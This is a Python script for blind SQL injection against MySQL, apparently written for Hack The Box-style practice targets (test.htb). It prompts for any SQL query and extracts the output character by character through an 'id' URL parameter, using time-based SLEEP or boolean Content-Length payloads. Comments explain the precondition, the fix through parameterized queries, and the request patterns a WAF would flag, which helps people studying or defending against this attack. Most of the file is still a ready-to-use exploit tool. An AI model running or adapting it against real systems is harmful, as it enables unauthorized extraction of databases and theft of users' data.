#!/usr/bin/python3
#by 21y4d
#Blind SQLi script for MySQL
#To adapt it to other DBMS, change the payloads in getQueryOutput()
#
# The technique only works when the value of the `id` parameter is
# concatenated into the SQL statement unescaped; parameterized queries
# (prepared statements) remove that condition entirely.  On the wire it
# shows up as a long burst of near-identical GET requests from one client
# whose query string carries MID()/IF()/SLEEP() and a trailing "--+".
import requests, time, urllib3
from termcolor import colored, cprint
from urllib.parse import quote
# Every request below is sent with verify=False, so the TLS-verification
# warning urllib3 would print on each one is silenced here.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Injection point: payloads are appended verbatim to the end of this string,
# i.e. directly after the value of the `id` parameter.
url = "https://www.test.htb/index.php?id=1" #CHANGE HERE
# One session for all requests (cookies / keep-alive are shared).
session = requests.Session()
# Wall-clock start, used for the "Total time" line at the end of the script.
initialTime = time.time()
# Text buffer that colorPrint()/colorPrintAttempt() redraw on screen.
output = ""
# Interactive setup: keep prompting until the query no longer contains "*"
# (the script expects a named column, see the message below).
while True:
    Method = input('SQLi type [T/B]: ') #T: Time-Based Blind SQLi, B: Boolean Blind SQLi
    queryInput = input('SQL query: ')
    if("*" not in queryInput):
        break
    print("Please specify a column name!")
if(Method == 'B'):
    print("Using Boolean Blind SQL Injection")
    # Baseline: Content-Length of the unmodified page.  getQueryOutput()
    # treats any response whose Content-Length differs from this as "true".
    # NOTE: assumes the server sends a Content-Length header at all; a
    # chunked response raises KeyError here.
    defaultLength = int(session.get(url,verify=False).headers['Content-Length'])
else:
    # Anything other than 'B' lands here, but getQueryOutput() only sends
    # requests for Method == 'T' or 'B'; for any other value it returns ""
    # and the int() conversion of the row count later raises ValueError.
    TIME = int(input('Sleep time (s) "High->slow, Low->inaccurate": ') or "3")
    print("Using Time-Based Blind SQL Injection with %s (s) sleep time" % TIME)
    time.sleep(1)
def colorPrintAttempt(Input):
    """Redraw the screen: accumulated ``output`` in green, then the current guess.

    Args:
        Input: the candidate string being tested right now; shown in red
            under the ``[*] Trying:`` label.
    """
    global output
    screen_reset = "\033c"
    print(screen_reset)
    lines_to_show = (
        (output, 'green'),
        ('[*] Trying: ' + Input, 'red'),
    )
    for text, colour in lines_to_show:
        cprint(text, colour)
def colorPrint():
    """Clear the terminal, print the accumulated ``output`` in green, pause 1 s.

    The pause keeps the redrawn screen readable before the next update.
    """
    global output
    screen_reset = "\033c"
    pause_seconds = 1
    print(screen_reset)
    cprint(output, 'green')
    time.sleep(pause_seconds)
def getQueryOutput(query, rowNumber=0, count=False):
    """Recover the text result of ``query`` one character at a time.

    For each position j (1..999) every character of ``dictionary`` is tried
    in turn; the first one for which the injected condition holds is
    appended to the result and the next position is tried.  The condition
    is observed either as a response that took at least ``TIME`` seconds
    (``Method == 'T'``) or as a Content-Length that differs from
    ``defaultLength`` (``Method == 'B'``).  When no character matches at a
    position the result so far is returned.

    Args:
        query: SQL SELECT whose output is read; intended to return a single
            column (the setup prompt rejects ``*``).
        rowNumber: 0-based row of the result set to read; ignored when
            ``count`` is True.
        count: when True, read the row count of ``query`` (digits only)
            instead of a row.

    Returns:
        The recovered string; ``""`` when nothing matched at position 1.

    Reads the module globals ``Method``, ``TIME``, ``defaultLength``,
    ``url`` and ``session``; the non-count path also prints ``totalRows``,
    which the caller assigns before the first non-count call.

    Detection note: each call issues up to len(dictionary) requests per
    character, all carrying MID() and a ``--+`` terminator in the query
    string -- a high-signal pattern for a WAF or request-log rule.  The
    time-based mode is additionally visible as a cluster of slow responses.
    """
    global TIME
    # flag: True while the last position produced a match.
    flag = True
    queryOutput = ""
    tempQueryOutput = ""
    if(count):
        # Row counts are numeric, so only digits are tried.
        dictionary = "0123456789"
    else:
        dictionary = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
    while flag:
        flag = False
        # j is the 1-based character position handed to MID().
        for j in range(1, 1000):
            for i in range(0, len(dictionary)):
                tempQueryOutput = queryOutput + dictionary[i]
                colorPrintAttempt(tempQueryOutput)
                if(Method == 'T'):
                    # Only the candidate character is percent-encoded; the
                    # remainder of the payload is appended to the URL as-is.
                    if(count):
                        payload = "' AND IF(MID((select count(*) from (%s) as totalCount),%s,1)='%s',SLEEP(%s),0)--+" % (query, str(j), quote(dictionary[i]), str(TIME))
                        print("\nGetting rows count...\n")
                    else:
                        payload = "' AND IF(MID((%s limit %s,1),%s,1)='%s',SLEEP(%s),0)--+" % (query, rowNumber, str(j), quote(dictionary[i]), str(TIME))
                        print("\nScanning row %s/%s...\n"%((rowNumber+1),totalRows))
                    fullurl = url+payload
                    startTime = time.time()
                    r = session.get(fullurl,verify=False)
                    elapsedTime = time.time() - startTime
                    # Oracle: a round trip of at least TIME seconds counts
                    # as a match (measured end to end, so it includes
                    # network latency).
                    if elapsedTime >= TIME:
                        flag = True
                        break
                elif(Method == 'B'):
                    # Boolean mode compares with != so a *matching*
                    # character is the one that changes the page size.
                    if(count):
                        payload = "' AND (MID((select count(*) from (%s) as totalCount),%s,1))!='%s'--+" % (query, str(j), quote(dictionary[i]))
                        print("\nGetting rows count...\n")
                    else:
                        payload = "' AND (MID((%s limit %s,1),%s,1))!='%s'--+" % (query, rowNumber, str(j), quote(dictionary[i]))
                        print("\nScanning row %s/%s...\n"%((rowNumber+1),totalRows))
                    fullurl = url+payload
                    r = session.get(url+payload,verify=False)
                    # Oracle: Content-Length differing from the baseline.
                    currentLength = int(r.headers['Content-Length'])
                    if(currentLength != defaultLength):
                        flag = True
                        break
                # Already False on this path (a match breaks out above);
                # kept as a no-op reset.
                flag = False
            if flag:
                # Character at position j found: commit it and go on to j+1.
                queryOutput = tempQueryOutput
                continue
            # No candidate matched at position j: the value is complete.
            break
    return queryOutput
# Step 1: number of rows the query returns (read as digits only).
# Raises ValueError if getQueryOutput() comes back with "" (no match).
totalRows = int(getQueryOutput(queryInput,0,True))
output = "\nTotal rows: %s\n"%(totalRows)
colorPrint()
# Step 2: read each row in turn; `output` accumulates across rows and is
# redrawn after every row.
for i in range(0, totalRows):
    currentOutput = getQueryOutput(queryInput,i)
    output += '\n[+] Query output: ' + currentOutput
    totalOutput = output +"\n"
    colorPrint()
# Final screen with every row together (only when there is more than one).
if(totalRows>1):
    print('\n[+] All rows:\n')
    output = totalOutput
    colorPrint()
totalTime = int(time.time()-initialTime)
# Elapsed seconds rendered as H:M:S via gmtime of the duration.
print("Total time: " + str(time.strftime('%H:%M:%S', time.gmtime(totalTime))) + " seconds!")